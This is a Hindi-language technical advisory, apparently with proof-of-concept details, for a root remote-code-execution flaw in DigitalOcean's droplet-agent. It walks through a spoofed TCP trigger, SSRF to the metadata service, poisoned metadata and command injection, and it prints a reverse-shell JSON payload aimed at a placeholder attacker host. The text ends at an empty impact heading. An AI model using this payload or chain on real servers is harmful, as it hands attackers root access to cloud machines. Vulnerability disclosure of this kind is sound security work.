
CVE-2026-24516 का तकनीकी विश्लेषण और PoC: DigitalOcean Droplet Agent में अनधिकृत रूट रिमोट कोड निष्पादन (CVSS 10.0)।
ID: CVE-2026-24516
शीर्षक: मेटाडेटा पॉइज़निंग और साइड-चैनल के माध्यम से अनऑथेंटिकेटेड रूट RCE
गंभीरता: क्रिटिकल (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
शोधकर्ता: Anmol Singh Rajput (@poxsky)
प्रभावित: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2
================================================================================
'droplet-agent' एक विशेषाधिकार प्राप्त सिस्टम डेमॉन (UID 0) है जो रिमोट टेलीमेट्री और डायग्नोस्टिक्स के लिए डिज़ाइन किया गया है। यह एक निष्क्रिय मॉनिटरिंग स्थिति बनाए रखता है जब तक कि एक विशिष्ट सिग्नलिंग अनुक्रम प्राप्त नहीं हो जाता। मुख्य भेद्यता लिंक-लोकल मेटाडेटा सेवा (169.254.169.254) के "इम्प्लिसिट ट्रस्ट मॉडल" में निहित है, जिसमें क्रिप्टोग्राफिक इंटीग्रिटी जांच का अभाव है।
A. पैसिव TCP साइड-चैनल (सिग्नलिंग लेयर) एजेंट पोर्ट 22 पर एक रॉ सॉकेट लिसनर (internal/metadata/watcher/ssh_watcher.go) का उपयोग करता है। यह TCP हेडर में हार्डकोडेड मैजिक कॉन्स्टेंट्स के आधार पर IDLE से ACTIVE में स्टेट ट्रांज़िशन करता है:
विश्लेषण: यह एक निर्धारक ट्रिगर बनाता है। एक बाहरी हमलावर इन मैजिक मानों के साथ एक एकल TCP SYN पैकेट स्पूफ करके इंफ्रास्ट्रक्चर कंट्रोल प्लेन का प्रतिरूपण कर सकता है।
B. ट्रस्ट बाउंड्री उल्लंघन (लिंक-लोकल दोष) सिग्नलिंग के बाद, एजेंट क्लाउड मेटाडेटा एंडपॉइंट से JSON निर्देश प्राप्त करता है। भेद्यता प्रामाणिकता सत्यापन का अभाव है। एजेंट 169.254.169.254 ज़ोन को "हार्डन्ड ट्रस्टेड ज़ोन" मानता है, और पेलोड हस्ताक्षर (HMAC/mTLS) सत्यापित करने में विफल रहता है।
C. सिंक: अनसैनिटाइज़्ड कमांड इंजेक्शन 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) में एक सिंक है जहाँ यह 'requesting' ऐरे को पार्स करता है।
प्रतिरूपण: हमलावर एक होस्टेड एप्लिकेशन में SSRF की पहचान करता है ताकि लिंक-लोकल मेटाडेटा सेवा को अनुरोध प्रॉक्सी किए जा सकें।
पॉइज़निंग: हमलावर एक दुर्भावनापूर्ण मेटाडेटा सर्वर सेट करता है जो लौटाता है: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}
द नॉक: हमलावर पोर्ट 22 पर "DODO-TTY" TCP ट्रिगर भेजता है।
एक्ज़ीक्यूशन: एजेंट ज़हरीले JSON को प्राप्त करता है और EFFECTIVE UID 0 (रूट) के साथ रिवर्स शेल निष्पादित करता है।
प्रभाव मूल्यांकन
